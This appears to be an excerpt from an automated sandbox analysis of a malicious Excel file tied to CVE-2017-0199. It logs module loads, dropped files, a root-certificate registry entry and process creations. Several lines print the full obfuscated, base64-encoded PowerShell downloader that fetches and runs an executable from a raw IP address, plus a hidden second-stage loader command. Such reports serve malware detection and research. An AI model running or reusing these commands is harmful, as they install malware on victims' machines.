        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn2.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntdsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.pdbhP source: powershell.exe, 00000005.00000002.444388800.0000000003546000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.pdb source: powershell.exe, 00000005.00000002.444388800.0000000003546000.00000004.00000800.00020000.00000000.sdmp
        Source: C0230000.0.drInitial sample: OLE indicators vbamacros = False
        Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxInitial sample: OLE indicators encrypted = True

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\wlanext.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899A022D push eax; iretd 5_2_000007FE899A0241
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899A00BD pushad ; iretd 5_2_000007FE899A00C1
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_01711D8E push ds; iretd 17_2_01711E19
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_01712E4A push dword ptr [ebx]; retf 17_2_01712E50
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_01715210 push ecx; ret 17_2_01715211
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_01715C0A push ecx; iretd 17_2_01715C0B
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_017140D1 push esi; iretd 17_2_017140D2
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_017158D7 push edi; ret 17_2_017158D8
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_017100D9 push ss; retf 17_2_017100DA
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_017128B7 push eax; iretd 17_2_017128C0
        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_017134B8 push eax; iretd 17_2_017134BA

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\wlanext.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\walnext[1].exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wlanext.exeJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
